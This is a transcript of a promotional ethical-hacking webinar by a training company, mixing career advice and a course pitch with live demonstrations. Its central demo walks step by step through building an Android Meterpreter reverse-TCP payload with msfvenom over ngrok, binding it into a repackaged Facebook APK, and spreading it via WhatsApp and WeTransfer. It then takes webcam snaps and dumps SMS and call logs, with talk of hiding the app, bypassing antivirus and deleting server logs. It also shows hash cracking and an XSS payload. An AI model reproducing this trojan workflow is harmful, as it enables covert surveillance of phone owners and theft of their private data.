Agarwal, with over a decade of experience working as a cybersecurity expert. He has closely worked with many law enforcement agencies and have successfully handled an impressive 10,000 cases. Mr. Agarwal's expertise in the field is unparalleled. But that's not all. His passion for knowledge sharing has led him to train over 50,000 students worldwide, making a significant impact on the future of cybersecurity. Moreover, his efforts have resulted in the placement of 12,000 students. So without any further delay, let's welcome Milind Agarwal to enlighten us with his invaluable insight in today's session. Over to you, sir.
Okay. So good afternoon, everyone. Milind Agarwal this side. So just a second, let me share the screen. Okay. So let me tell you about myself. Currently, I am serving for law enforcement agencies around more than 20 cyber cells of across the India, and I have handled more than 10,000 of cases. Plus, I'm associated with some of the brands. I will not going to take the name of those brands. So I'm providing crime and investigation related consultancy and the vulnerability auditing to those brands. Okay. So today in this master class, we are going to discuss about the cybersecurity, and we are going to learn some methodologies as well related to the ethical hacking and cybersecurity. So our today's agenda is we will understand the roadmap, basic requirements to be an ethical hacker, what certification do we require to grab the jobs, what are the salaries and the scope in the field of cybersecurity, is it easy to learn? So we are going to learn some demonstrations as well. I'm going to show you some demonstrations, some practical, like mobile hacking, where we are going to create a very simple payload. Then in the second demonstration, we are going to bind that payload with a popular applications like either Facebook or WhatsApp. So if someone going to open the Facebook or going to log in into his account, we will grab all the feature of his mobile phone. We are going to exploit that mobile phone. Then we will understand about the weak and the strong passwords. And in the last, we will discuss about the XSS, that is cross-site scripting. Okay. So first of all, we have to understand about the correct keyword. The ethical hacking word is the most common and popular term among us, but that is not the right keyword, right? Like for example, on Google, I'm going to search ethical hacking jobs. So I hardly find 76 or 80 jobs on LinkedIn related to the ethical hacking. So ethical hacking is not a wrong word, but it is not a correct keyword which we have to include in our resume or the correct keyword to search the job. What is the correct keyword? Correct keyword is VAPT jobs, right? So when we search the VAPT jobs, we can find more than 3,000 jobs available related to the field of VAPT, right? So what is VAPT? We are going to learn in few minutes. Okay, so I have one opening of a company that is collaborated with a government agency. So this opening is from 10th of July. Okay, so here we can see in these opening, they have used a term vulnerability and threat management. That is a VAPT only. Cyber law, Android, iOS security researcher, right? There is no term related to hacking or ethical hacking. So first of all, we have to understand which keyword is accurate or proper. So VAPT is the correct word. Okay. So what is VAPT? VA and PT, there are two terms. VA means vulnerability assessment. For example, there is a weak lock of your home. So the weak lock is the vulnerability of your door, of a door of your home. And PT means penetration testing. That means the technology which we use to break the lock of your door, right? So there are two terms. So we have to we have to prepare two type of report, VA report and PT report. That means the network or a website is vulnerable or not. If it is vulnerable, then the preparation of that report is called vulnerability assessment report. And we are going to use some technology or mechanism to break that vulnerability, that is called exploit, right? So preparation of the report of bypassing the vulnerability is called penetration testing report. So majorly there are tons of dozens of courses available on internet, on YouTube, or many other websites. So basically there is a confusion going on in the market. Most of the students are focusing on Wi-Fi hacking, understanding the Kali, mobile phone hacking, website hacking, bypassing admin pages, right? Those points are also very important to learn, but basically this is a confusion. Will can we able to get the job if we know about the Wi-Fi hacking? Will any company provide us the job if we know mobile phone hacking? No, they are not going to provide you the job if we know about the Wi-Fi or mobile phone hacking only. Right? So majorly many students and the trainers are confused what to learn and what to not. So Wi-Fi hacking, mobile phone hacking is also part of cybersecurity. It is also very important to learn. And in our course, I am going to train you about the mobile phone Wi-Fi hacking as well. But this is not our objective. Our objective is VAPT report, right? To create, to design, to make a VAPT report. So basically, cybersecurity or a VAPT are divided into 4 fields: network penetration testing, web application penetration testing, mobile penetration testing, and the blockchain penetration testing, right? So what is network penetration testing? To find the vulnerabilities or to bypass those vulnerabilities present in the network. So network includes server, routers, firewalls. Right? Web application penetration testing means to find the bugs, to exploit those bugs present in the web application. Mobile penetration testing, again the same thing, to find the bugs or exploiting those bugs present in your mobile phones. Similarly, with the blockchain, if any technology, any website, or any software running on a blockchain technology, and if we find any bug or we exploit those bugs in those blockchain technologies, called blockchain penetration testing. So majorly the question is, when it comes with a web application or a network application testing, so question is, do we have to learn all the languages? Do we have to learn iOS, Android, Java, .NET, PHP, every, because website can be built or developed on any languages, right? So it is not important. But we have to understand the basic architecture of a website, and we have to learn only one language, either PHP, Python, Java, .NET, or any of one language, so that whenever any code is provided to us, we can able to understand what that code is going to do, right? And to find the bugs in those codes. So what are the basic requirement to become a VAPT expert or to become a cybersecurity expert? So first of all, computer science degree is preferred, but it's optional. Non-technical people can also join this course. We have to understand about the networking concept that include IP address, MAC addresses, packets, TCP, UDP protocols. and you have to be a good knowledge in Kali or Linux or Ubuntu, any of one operating system. One programming language is must, either Python, PHP, Java, or .NET, and hacking concepts. Right. I hope you all are aware with script kiddie. So what are script kiddie? Who are based on the free softwares or the free programs, right? So if you want to develop your own program, or if you want to develop your own script, then at least you have to learn one language. Right? So one language is very important for us. So now let's talk about the certifications. So there are two certifications available. There are dozens of certifications available in the market basically, but OSCP and PNPT are the best one. OSCP stands for Offensive Security. So Offensive Security is that company who have developed the Kali Linux. And the second is PNPT, Practical Network Penetration Tester. So these two certifications are very good. You can choose one of these certificates. So what are the job profiles? After learning this course, after learning cybersecurity, there are tons of jobs like junior cybersecurity analyst. So this required 0 to 2 years of experience, and the starting package will be 8 to 12 lakh per annum. The second is cyber security analyst. Then after that, you will become senior cyber security analyst. Then you after 7 of years, you will be promoted to cyber security manager, and then senior penetration tester, and then cyber security architect. Right. So a few minutes before, I have shown you one PDF also, that is the current opening in a company that also required the same job profiles. There is no job profile available for ethical hacker because that is not a correct word. Okay. So now let's talk about, is it easy to learn? Is it easy to learn ethical hacking or cybersecurity? So let me show you some demonstrations. Okay. So I hope you are familiar with this machine. This is called a virtual operating system. What is virtual operating system? Uh, on your Windows 12 or 11, you can operate another operating systems as well, right? Like I am running Kali operating system on this Windows 11. So this is called virtual operating system. So let me logging into this machine. Okay. So in this demonstration, I'm going to create one small payload or one application. When we install or when user install that application in his mobile phone, uh, we will grab complete control over his phone. Okay. So for this, we are going to use one VPN, that is a virtual private network, which will provide us the static port. Okay. Again, now you will think, what are ports and what are static and the dynamic ports, what are temporary ports. So I told you, to learn all these concepts, we have to understand about the basics of networking concept. So in today's master class, I'm just going to show you the practical only, right? So to create a payload, first of all, we have to enter into the super user. So now we become the super user. We are logged in into the root. Now we will use one command, that is, first of all, we are going to use ngrog. Basically, this is a VPN, and we will start this VPN on a TCP using 4444 port. Just a second. Okay. Just a second, some facing some errors. Okay, okay, so I think we have to sign in again into this NGRock. So what is NGRock? Let me show you. So NGRock is a website which will provide us the static IP address and the static port. So there are dozens of these kind of websites available in the market. NGRock is one of them. So we have to sign up into this website first of all. So I hope you have heard about the disposable email. These are temp mails. Right? So temp mail will help us to create the account without logging into our Gmail or your Yahoo mails. Right? You can use these temporary emails. So we will prevent our email from spamming. So we are going to sign up here with the name ACODS UK. This will be our email ID. We will use some password. So currently we are signing up in NGRock. So I hope NGRock is clear to you all. NGRock is providing us the static IP and the static ports, which will help us to create the payload or the exploits. Okay. So after signing up, we will receive one email, right? So in this temporary email, we receive the verification mail from NGRock. So let's verify our email first of all. So after verifying, it is showing download NGRock. So we have to download it for Linux. Click on this, download, and then save it in our system. After downloading it, we have to unzip this NGRock. So all commands are written over here, what steps we have to follow. It's a very easy practical, right? That doesn't need any coding or anything. So we will extract this. Okay, so this has been extracted to NGRock 2. Now we have to type this command. This is an authentication token which will help you to log in into the NGRock. Mhm. So we have signed in to the NGRock by using this authentication token. Okay. Now let's start this NGRock again on TCP 4444. Right. Okay, now NGRock has been started on this machine on TCP IP, which is banded with the subdomain 0.tcp.in ngrock.io, and they have provided us one static port, that is 16336. Okay, so now we have to use the root terminal for our practical. So how to log in into the root? By typing sudo su. Su stands for super user. Okay, now we are going to use one command, that is msf venom. So msf venom is a tool which will create the application, and -p stands for payload, which payload we have to integrate into that application. So I know that payload basically. So that is interpreter, reverse, TCP, and then we have to write lhost equal to. So we have to provide the IP address of that local host in which we want a connection of that mobile phone to a system, right? I hope you are getting the point. What I mean to say, when a user going to install the application in his mobile phone, he will connect it to this subdomain, right? So in L host, we will insert this subdomain and we are going to write L port. The L port will be this port number, right? Then we will create one application with the name ACODS.apk. So this will going to create one application with the name ACODS, which will contain the payload for Android mobile phones. And any of user install this application in his mobile, he will connect it to the local host which we have provided, right? So we are going to open the folder first of all. Okay, so now we can see the accord.apk has been created. Now we are going to upload this file on vtransfer.com. So we are using one website, vtransfer, and we will drag this APK to vtransfer. And get a link. It will take few seconds. After uploading the application, this website will provide us a URL. So what we are going to do, we will copy this URL and we will share this URL with someone on WhatsApp. So I'm going to send this URL to my another phone. So I have shared one URL to my another phone. Let me connect my Android phone. But before installing this application, we have to write one more command. So who are those participants who are familiar with Kali? I hope they all are getting the point. But those participants who are not familiar with the Kali machine, I'm just demonstrating them how easy it is to learn hacking and how to hack the phones. So we have to write MSF console. So this is going to open the Metasploit framework in the console mode. So it's very easy. So this is going to take some few seconds. Okay, so we have to use one exploit that is a multiple handler. What this will do, this will listen all the interaction which Kali is receiving outside this framework, right? So we are using the multi-handler and we will set the payload to Android. Once again, set payload Android meter reverse TCP. And we will set the L host to default L host, that is 000. And we will run this exploit in the background, right? So now let me connect my mobile phone to AnyDesk so that you all can view my mobile phone. So in my WhatsApp, I have received one URL. So let's download this URL first of all. You can either share the APK directly by using WhatsApp. So now download this file. Then we are going to install it. Right? So currently the application is going to install with the name main activity, because we have not binded this application with any other phone. Just a second. So I'm receiving some messages that I'm not familiar with this platform. So don't worry about the Kali or Linux. It's just a demonstration. If you are not familiar, don't worry about these platforms. In our main course, I'm going to demonstrate you about these machines, how to use, how to get familiar. So do not worry about it. This is just a demonstration. Okay. So once we install this application, we received some session that is open, right? So we have to type one command, session -l. So this will show you the list of available sessions, and we have to interact with the first ID, one ID. Right? So we will type -i1. So this will give you a meterpreter session. What is meterpreter? Meta interpreter. That means interpreter between the mobile and the Kali Linux. So you have to type question mark if you are not aware with the commands. So this will show you all the command list. Like for example, I'm going to type one command, webcam snap 2. So what this will do, this will start the camera of my mobile phone and take one snap. And the image has been saved with the name of QIVM. Okay, so let's open this image. Open folder. The image name is QI. Okay, this is the image. So my back camera has been enabled and took one snap from my mobile phone. So there are dozens of commands present in this meterpreter. Like you can check app list. So you will get all the list of mobile application which is installed in my Android phones. You can check dump SMS. You will get all the SMSs installed in my mobile phones. For dump. Okay, so let me check. SMS. Okay, so we receive these SMSs, right? So we are not going to read these messages. Okay. So in this demonstration, I have created one small APK, and we can hide that application in the mobile phone. So there are few commands more present in this terminal where we can hide the mobile application from the victim's phone. Now I'm going to integrate, I'm going to bind this application with the Facebook application, right? Okay, so question is application was not successful. Yeah. So basically my phone is Android 13. So I have created a payload for Android 12, right? So this shows a message that application has not been installed, but we got the complete access of a mobile phone. Let me show you, right? Application has been installed with the name of main activity. So once you click on this application, there is no interface. You cannot able to view any of screen. But how, if you are going to click 10 or 15 times, I will get the sessions here. See, I have clicked around 17 to 18 times. So I'm getting 20 or 21 sessions. So as many far as much you click on this icon, I will get the sessions of your mobile phones, right? So let me check session hyphen list. Sorry. So I have to exit from this. So I have got 21 sessions, right? So yes, this is possible whether the application has been installed or not. If you have just downloaded the application and uh, if any icon has been created, then simply I will get complete control of your mobile phone. So we can modify this application into whatever you currently going on in your mind, right? So I'm going to create one more payload by using Facebook application. Okay, so let me show you. It's a very simple command, that is msf venom -x fb.apk. So currently FB, I have downloaded one application of a Facebook from APK Mirror website. And again, -x denotes the application binding. So -x command, what it will do, this will bind your payload with the facebook.application file. So first of all, we have to enter the L host, that is the local host. So this is our local host. Okay. Then we have to write the L port. So L port is 16336. Then we will create with the name of new FB or FB more.apk. So first of all, what this command will do, this will reverse engineer the Facebook application, this FB application, and then this will bind Android payload into the Facebook application, and then again create the new application with the name FB mode.apk. Just a second. Okay. So basically, the APK has not been created because the fp.apk is not present here. So we have to check the downloads. Okay, so fb.apk is present in the download folder. So we have to create this payload again. Okay, so now it will create the new application with fb-mode.apk. So this is going to take around 10 seconds. So this is creating, this has been reverse engineered our application. Now this is creating one new application and assigning the signing key and the key store, then decompiling the original application, decompiling our payload, that is meter-operator reverse TCP, and automatically this added some permissions like receive SMS, set wallpaper, read call log, send SMS. So this application will not grab the WhatsApp or the Facebook chat because that will require one more permission. So that I will teach you in the main course how to grab the WhatsApp and the Facebook chat. But again, our objective is not to hack the mobile phone, not to hack the WhatsApp or the Facebook. Our objective is to check the VAPT reports or the vulnerabilities present in the mobile phones. Okay. So as we can see, one application has been created with the name fbmode.apk. So again, we have to upload this application on WeTransfer. We will go to downloads. fbmode.apk. Okay. So this is the application. We will drag this to WeTransfer and we will click on the get link. Okay, so I'm receiving some questions that if uh, internet is off. So if internet is off, you cannot able to get the data. But once he enable the internet again, you will again get the session automatically, right? So if that SMS is still present in the mobile phone, you will get the APK. But if that SMS has been deleted by the user, then you cannot able to get that message because this application is not any database. So now let's copy this URL and we will share it with someone. Okay. Now let me show you my mobile phone again. I'm going to click on this URL and we will download this APK. Open it. So one more thing we have to do. Okay, one second. Let me show you one message. So this is showing that this app is unsafe because we have downloaded it from the browser, right? If you install it from Play Store, this will not show any error, but you cannot upload this APK on the Play Store, right? So we have to click on the install anyway. Then we have to open it. You have to give all the permissions to this mobile phone, and then this will open the Facebook. But once the Facebook is open, let me check whether we got the session or not. Okay, we have to check sessions -L. So we have got the session number 22. So session I-22. So we again got the meter session, right? Now again you can dump SMS, you can grab all the call logs, you can check the list of application, you can remove any application, you can even send the SMS to anyone by using this. So there are many of the commands which we can execute in the mobile phone directly, right? You can check the screenshots as well. Okay. So in this masterclass, I'm going to demonstrate you one more topic, that is a weak versus strong password, right? So it's a basically very small demonstration on hacking the mobile phone. We can modify it by bypassing some antiviruses if installed in the mobile phones as well. Okay, so I'm receiving some questions that why would anyone install if the app receives security threats? So I'm saying we can bypass all these threats, right? We can integrate, we can modify, we can insert our scripts. So I'm not making that payload to such advanced level, right? We can bypass all these threats. So don't worry about it. Okay, so I'm getting one more question that can we able to protect it? No. Google Play Protect will identify and will give you the warning because you have installed the application from third-party source, right? So again, I'm saying you, our main objective is not to hack the mobile phones, right? Our objective is to understand the VAPT, and our objective is how easy is it to learn the cybersecurity or not. It's just a demonstration, so don't worry about all these warnings, right? Okay, so there is a one website. Have I been pawned? Have I been pawned, right? So let me enter my personal email ID in this box. So basically this website contains dozens of data, leaked data of, like, for example, if any of the website get hacked and the database leak on the internet. So basically this website purchase those databases and this will show whether my data has been leaked or not. So this is showing that there are 18 breaches by this email ID. Like there are, my email ID is present with them and maybe my password is also present with them. So this is showing that I have logged in or signed up in the zero web host in the year of before 2015. But in 2015, the database has been leaked and that database contain my email ID and my passwords. Similarly, Abuse with us is also get hacked. Big Basket was also hacked in 2020, and the leaked database contain my mobile phone, my email ID, my password. Now, for example, if my Gmail ID and the big basket password both are same, and anyone got the database of big basket from dark web or from any other website, so he simply can log in into my Gmail ID, right? So you already have heard that try to sign up different websites by using different passwords, but many of the website use hashes. Now what are hashes? I will teach you in some later classes later on. So many of the website use hashes, right? But if your password is weak, then anyone can break your hash. Very few websites store your password in the clear text. Many of the website store your password in the hashes. So whenever the website got hacked, your password will not get leaked. Only the hashes will get leaked. But if you have a weak password, then anyone can break your hash. So I'm going to demonstrate you how to break those hash. Right? So I'm going to create one file with the name accords.txt, and I'm inserting hello and welcome to Accords. Now let me save this file. So we have created one text file with the name accords.txt. So now I'm going to create one zip file with name accords.zip, and I'm inserting this accords.txt file in this zip file, right? So -e stands for encrypting this zip file. Now let's press the enter. Now this is asking for the password. I'm going to insert a very weak password, that is admin123. Right? So whenever someone try to unzip this file, so this will going to ask the password, right? So I have used the password admin123. So whenever you are encrypting any file, the password is binded with the zip file already, right? So we are going to use one tool that is zip to John, and we will take out this hash file from this zip file, right? Like accords.zip, accords hash.txt, right? So this will take out the hash file and save into the accords hash.txt. Okay, so the file has been created, accords hash.txt. Now let's open this accords hash.txt. So your password is saved in this file in the encrypted format, as you all can see. Okay. So to decrypt this password, your password can be decrypted if it is weak, but if your password is strong, it can't be decrypted, right? So hacker have to use a brute force attack. So in this demonstration, I'm going to use a dictionary attack. So we are going to use a tool that is John the Ripper. That is the tool name. List equal to user share dirb word list other as 0, and we will insert this file name over here. Then press enter. So this broke your password within chunks of seconds. Admin123, your password has been decrypted from this hash file, right? Now, what if I create a password with a, what if I create a very strong password like -e accords 1.zip and accords.txt. And I'm going to enter a very strong password by using small character, capital characters, and special symbols. So we will create one new file, accords1.txt. So let me show you that hash file. So again, we got the hash file, right? So this is the demonstration only which I want you to understand is, for example, if your file has been leaked and someone have your hash, he cannot able to break your hash if your password is strong. So I'm going to use a dictionary attack. I'm not using a brute force attack because this will going to take a lot of it may take up to few hours, few days, or few months as well. Depends on your password. John, what list? Okay. So the same dictionary file I'm using it. Okay. So this dictionary file contains thousands of passwords only, and after a few seconds, it's showing that this software or a word list cannot able to break the password, cannot able to decrypt the passwords, right? So that I want you to understand is if you are using a strong password or any website, and if the database got leaked, the hacker or attacker cannot able to break your password, right? Okay. So my last demonstration is on website VAPT. Website VAPT. So majorly, many of the websites contains dozens of bugs. So there is one common bug generally present on the sites which has been developed by uh, developers who are not having good experience in the field of security. So this is called cross-site scripting, which means executing third-party scripts. So I'm using one of the website that is lab. So let me type one name, ACOD. So this is simply typing hello ACOD. Right. So I'm going to create one script that is script alert ACOD script. So basically this is a third party script. So this will create an alert box. So once you paste this script and click on submit, so this is showing you a pop-up, right? So the script has been executed. So if any third party scripts are getting executed on a website, then uh, any attacker or hacker can grab the sessions of the logged in users or of those users, or can direct the users to third party websites or to a phishing websites, right? So how to block this reflected accesses? Let me view the source. Okay. So basically they have created one variable and simply they are printing the name, right? Echo hello, and they are printing the name which has been inserted by the user. So they are not sanitizing any of the input. So the best practice is whenever you are getting a name, whenever you are making user to insert anything into your text box, you have to use one mechanism that is HTML special char function. So this will encrypt all the special symbols like open tag, close tag, comma, slashes. So this will sanitize all the input which has been inserted by the user. Right. So later on, we will understand more about the VAPT, more about the website VAPTs, and more about the network VAPTs. So that's all for today. If there are any question, you can ask me directly on chat box, and I will answer your all the questions. Okay, so I have received one question that salted hashes will protect. Yes, salted hashes will protect your passwords. Okay, there is one more question. How can we hide to yourself, or we can remove identity from the log? Okay, so what kind of logs we are talking about? I'm not getting this question basically. Okay, so maybe you are talking about some logs which has been created on a server or to a website. So if you can able to reach that file where the log has been created, then simply you can remove it. What are the requirement of this course? Okay, so Nilesh is asking requirement of the course. Okay. So to understand this course, first of all, you must have a good knowledge of a basic computing skills, right? Basic computing skills means if you have a computer science degree or if you are non-technical background as well. So in this course, we are going to start from the scratch only, right? So I will make you understand what are IP addresses, what are the basic computing skills. So if you just know about how to surf on the Google, then you can join the course. If you know how to make an email, you can simply join the course, because this course will start from the scratch only, right? What are ports, what are MAC addresses, what are IP addresses. We will have the hands-on on the Kali, Linux, Ubuntu, so that you can easily type the commands and all. Then I will make you train on the Python as well. So we are going to have some projects. We will create these all mobile phone hacking payloads by using a Python language as well, right? We are not good. We are not based on the tools. We will create our own tools by using Python. And we must have the knowledge of hacking concepts as well, like what are hash values, what are cryptography. So everything is included in this course. Okay, so Sagar is asking about the investigation. Okay, so many of the students are familiar with the cyber investigation because we all are watching movies and the series, and many of the students get attracted with the investigation and all. But you will not able to find a good jobs in the field of investigation. It's a very long run, right? You can do freelancing and all, but you can't able to get a good jobs in the field of investigation. You can get a contractual jobs in the field of cybercrime investigation, but my suggestion is opt for VAPT jobs, right? Because if you go in the cybercrime investigation, you will get the variable of income. You will not get a fixed assets, fixed income. If you go opt for VAPT jobs, you will have the fixed income in your hand. Okay, so course duration and everything will be shared by the ACODS team shortly. If any other question related to the demonstration or anything, you can ask me directly. Regarding the course fees and the duration, the ACODS team will deal with you directly. Okay, any other questions? Okay, fees and everything will be discussed by the ACODS team. Okay, so I have received one more question. How to be anonymous completely without proxy or VPN? No. If you want to be anonymous, you have to use the VPN and the proxies, right? Okay, if Ayush is asking if I have no knowledge about computers, Ayush, you must have the basic knowledge like how to operate Excels, how to send emails, how to join the Zoom class, right? So if you have joined the Zoom class, so I think you have a basic knowledge of the computers, right? So you can easily learn the course. Okay. So Vivek is asking, can fresher or experience in other domains get jobs in security? Mm, fresher can also get the jobs. I just have showed you one PDF file as well. If you want, I can share it with you directly. And if you are experienced in other domain and if you are switching the domain in cybersecurity, then you will be considered as a fresher only, right? That experience will not be counted. Okay, if you are having a 10 years of experience in SAP, yeah, this will suit for you because cybersecurity is very important for us, right? In whatever field you are, you must have the knowledge of cybersecurity, whether you want the job or not, but you must have the knowledge so that you can secure yourself, and this will be considered as an add-on. Right, Suresh, you are getting my point. This will be considered as an add-on that apart from SAP, you have a good knowledge in the VAPT and the cybersecurities. Okay, Sayed is asking which OS to be familiar why Linux is given. Okay, so this is a very good question, Sayed. That why Linux is given more priority than the Windows, because Sayed, Linux is open source, right? So many of companies are developing their own operating system by using Linux. Windows is closed source, so then they cannot able to create their own operating system, and it's very complicated to create a new operating system. So due to this open source, companies are integrating their hacking tools with these Linux machines. So there are many operating systems, but all are based on Linux, like Kali Linux, Backtrack, Parrot. There are many operating systems, but all are based on Linux only, right?
Okay. Now, Thank you, sir, for this insightful session. Now, let me brief you about our company. We are a leading IT training provider offering courses in data science, data engineering, cybersecurity, and DevOps, and more since 2009. And we have successfully placed over 22,000 students. Regarding the programs we are offering, it's the CPD UK Cybersecurity Certification Program. This internationally recognized certification is specifically designed by our industry experts, and the program includes ACODS LMS portal access for lifetime, job guarantee, one-to-one live sessions, one-to-one mentorship, the prestigious CPT UK certification to get in the eyes of top recruiters, and many more perks else you are interested. You can download the curriculum through the link in your chat box. You can check there, and then our program coordinator will contact you for the details and for the interest you have. Thank you so much, everyone, for joining. Have a nice day.